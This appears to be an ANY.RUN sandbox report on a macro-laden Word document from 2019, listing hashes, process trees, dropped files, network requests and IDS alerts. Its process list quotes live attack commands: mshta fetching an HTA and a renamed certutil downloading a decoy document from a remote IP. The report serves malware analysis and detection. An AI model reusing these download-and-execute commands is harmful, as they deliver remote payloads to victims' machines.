analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

244025984d8e74398ed33188252037318222e4ff3086208057a522e94a01fe2f.doc

Full analysis: https://app.any.run/tasks/47b92e10-eab1-4f5c-8158-a3826865d384
Verdict: Malicious activity
Analysis date: April 24, 2019, 01:56:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 936, Author: Administrator, Template: Normal, Last Saved By: Windows , Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 16 10:47:00 2016, Last Saved Time/Date: Tue Apr 23 04:39:00 2019, Number of Pages: 1, Number of Words: 9, Number of Characters: 54, Security: 0
MD5:

CB075DBECDCEBD34458534FB80B40222

SHA1:

E92337FF5D8026814093D9784FDAB9FA149F5DCA

SHA256:

244025984D8E74398ED33188252037318222E4FF3086208057A522E94A01FE2F

SSDEEP:

768:Xqm8NT1mkxbBtA7SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS6YqmL8+M0j85w:n8RZ7u6YVfMYGNvgAPoQ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • windows.cpl (PID: 3600)
      • windows.cpl (PID: 4020)
      • windows.cpl (PID: 2480)
      • windows.cpl (PID: 2072)
      • windows.cpl (PID: 1868)
      • wtask.exe (PID: 2212)
      • winwsh.exe (PID: 936)
      • wtask.exe (PID: 2060)
      • InstallUtil.exe (PID: 2452)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2732)
    • Loads the Task Scheduler COM API

      • wtask.exe (PID: 2060)
      • wtask.exe (PID: 2212)
    • Loads dropped or rewritten executable

      • InstallUtil.exe (PID: 2452)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 4052)
      • cmd.exe (PID: 3580)
      • powershell.exe (PID: 3944)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 3196)
      • powershell.exe (PID: 3944)
      • cmd.exe (PID: 3172)
      • cmd.exe (PID: 2708)
      • cmd.exe (PID: 1972)
    • Starts application with an unusual extension

      • cmd.exe (PID: 3788)
      • cmd.exe (PID: 1908)
      • cmd.exe (PID: 988)
      • cmd.exe (PID: 2044)
      • cmd.exe (PID: 3992)
    • Starts Microsoft Office Application

      • cmd.exe (PID: 3700)
    • Creates files in the user directory

      • powershell.exe (PID: 3944)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2036)
    • Reads internet explorer settings

      • mshta.exe (PID: 4052)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2036)
      • WINWORD.EXE (PID: 3640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 ?ĵ?
CompObjUserTypeLen: 28
KSOProductBuildVer: 2052-10.1.0.5864
CodePage: Windows Simplified Chinese (PRC, Singapore)
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 14
CharCountWithSpaces: 62
MMClips: -
HiddenSlides: -
Notes: -
Slides: -
Paragraphs: 1
Lines: 1
Bytes: -
Company: -
Manager: -
PresentationTarget: -
Category: -
Security: None
Characters: 54
Words: 9
Pages: 1
ModifyDate: 2019:04:23 03:39:00
CreateDate: 2016:08:16 09:47:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: Windows ?û?
Template: Normal
Comments: -
Keywords: -
Author: Administrator
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
74
Monitored processes
29
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs mshta.exe cmd.exe no specs cmd.exe no specs cmd.exe cmd.exe no specs windows.cpl cmd.exe no specs windows.cpl no specs cmd.exe no specs cmd.exe no specs windows.cpl winword.exe no specs cmd.exe no specs windows.cpl no specs cmd.exe no specs windows.cpl no specs cmd.exe no specs powershell.exe cmd.exe cmd.exe cmd.exe cmd.exe no specs wtask.exe no specs cmd.exe no specs wtask.exe no specs cmd.exe no specs winwsh.exe no specs installutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2036"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\244025984d8e74398ed33188252037318222e4ff3086208057a522e94a01fe2f.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4052mshta.exe http://144.202.54.86:80/download/Mau1.htaC:\Windows\system32\mshta.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3420"C:\Windows\System32\cmd.exe" /c echo cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" >C:\Users\admin\AppData\Local\Temp\cp13.batC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3580"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\cp13.batC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3196cmd.exe /c copy /y C:\Windows\system32\certutil.exe "C:\Users\admin\AppData\Local\Temp\windows.cpl" C:\Windows\system32\cmd.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3788"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Chua Dang vien.docx" C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Chua Dang vien.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2480C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Chua Dang vien.docx" C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Chua Dang vien.docx"C:\Users\admin\AppData\Local\Temp\windows.cpl
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
988"C:\Windows\System32\cmd.exe" /c C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Chua Dang vien.docx" deleteC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4020C:\Users\admin\AppData\Local\Temp\windows.cpl -gmt -urlcache -f "http://144.202.54.86:80/download/Mau cam ket danh cho Chua Dang vien.docx" deleteC:\Users\admin\AppData\Local\Temp\windows.cplcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3700"C:\Windows\System32\cmd.exe" /c start C:\Users\admin\AppData\Local\Temp\"Mau cam ket danh cho Chua Dang vien.docx"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 500
Read events
2 035
Write events
0
Delete events
0

Modification events

No data
Executable files
5
Suspicious files
11
Text files
8
Unknown types
3

Dropped files

PID
Process
Filename
Type
2036WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A8D.tmp.cvr
MD5:
SHA256:
2036WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC9CEB6F904E21191.TMP
MD5:
SHA256:
2036WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF1F4C0077457A9A8D.TMP
MD5:
SHA256:
3640WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR872D.tmp.cvr
MD5:
SHA256:
3944powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YFQK6C4NXAPKSGGIWR08.temp
MD5:
SHA256:
2480windows.cplC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AC448FDD3FDA567F658EDA06D6E8B320binary
MD5:3A3D97E7E63DE6C22841054445A93AF5
SHA256:8ADBA5405CBA182B7EC7BA7E3BF472D3523B16D901E7D3FA60B2443976F01F58
2480windows.cplC:\Users\admin\AppData\Local\Temp\Mau cam ket danh cho Chua Dang vien.docxdocument
MD5:2C20CFE31791231BE5B9769706D1C61D
SHA256:BF32A25F376C267242C44A39787C8BCEAA9D31F4A6541F54F64A4AAC86556C80
4052mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\Mau1[1].htahtml
MD5:95C8C78C471AFC8CF6DDEC5560AA516C
SHA256:456051981F15E64455EF2ACE978DF34C7F179E3510EC5AAB56A56F37D3897A26
2072windows.cplC:\Users\admin\AppData\Local\Temp\windat.ps1text
MD5:9282D2D4E22F688D899BD2A11D9B78B7
SHA256:529CA7762C1EEAC0A42D5CD0592910CCED68765198198D42917CB979CD315F40
2036WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$4025984d8e74398ed33188252037318222e4ff3086208057a522e94a01fe2f.docpgc
MD5:A67A83B55B7CAD522A14C6DCFF9208E6
SHA256:92CABD19F0549DA537CCA22554CAD9B2D8B4464B5187F1877A86B7E0DF12DCE7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
11
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3600
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/0423.dat
US
text
66.8 Kb
suspicious
2480
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Chua%20Dang%20vien.docx
US
document
22.0 Kb
suspicious
2480
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau%20cam%20ket%20danh%20cho%20Chua%20Dang%20vien.docx
US
document
22.0 Kb
suspicious
3600
windows.cpl
GET
200
144.202.54.86:80
http://144.202.54.86/download/0423.dat
US
text
66.8 Kb
suspicious
4052
mshta.exe
GET
200
144.202.54.86:80
http://144.202.54.86/download/Mau1.hta
US
html
7.57 Kb
suspicious
2452
InstallUtil.exe
GET
200
205.185.216.10:80
http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
US
compressed
55.6 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4052
mshta.exe
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
3600
windows.cpl
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
2480
windows.cpl
144.202.54.86:80
Baltimore Technology Park, LLC
US
suspicious
2452
InstallUtil.exe
205.185.216.10:80
www.download.windowsupdate.com
Highwinds Network Group, Inc.
US
whitelisted
2452
InstallUtil.exe
144.202.54.86:443
Baltimore Technology Park, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
www.download.windowsupdate.com
  • 205.185.216.10
  • 205.185.216.42
  • 205.185.216.10
  • 205.185.216.10
whitelisted

Threats

PID
Process
Class
Message
4052
mshta.exe
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
4052
mshta.exe
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
4052
mshta.exe
A Network Trojan was detected
ET CURRENT_EVENTS SUSPICIOUS MSXMLHTTP DL of HTA (Observed in CVE-2017-0199)
2480
windows.cpl
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3600
windows.cpl
Misc activity
ET INFO Certificate with Unknown Content M1
3600
windows.cpl
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3600
windows.cpl
Misc activity
ET INFO Certificate with Unknown Content M1
4052
mshta.exe
Misc activity
SUSPICIOUS [PTsecurity] PowerShell Execution
2 ETPRO signatures available at the full report
No debug info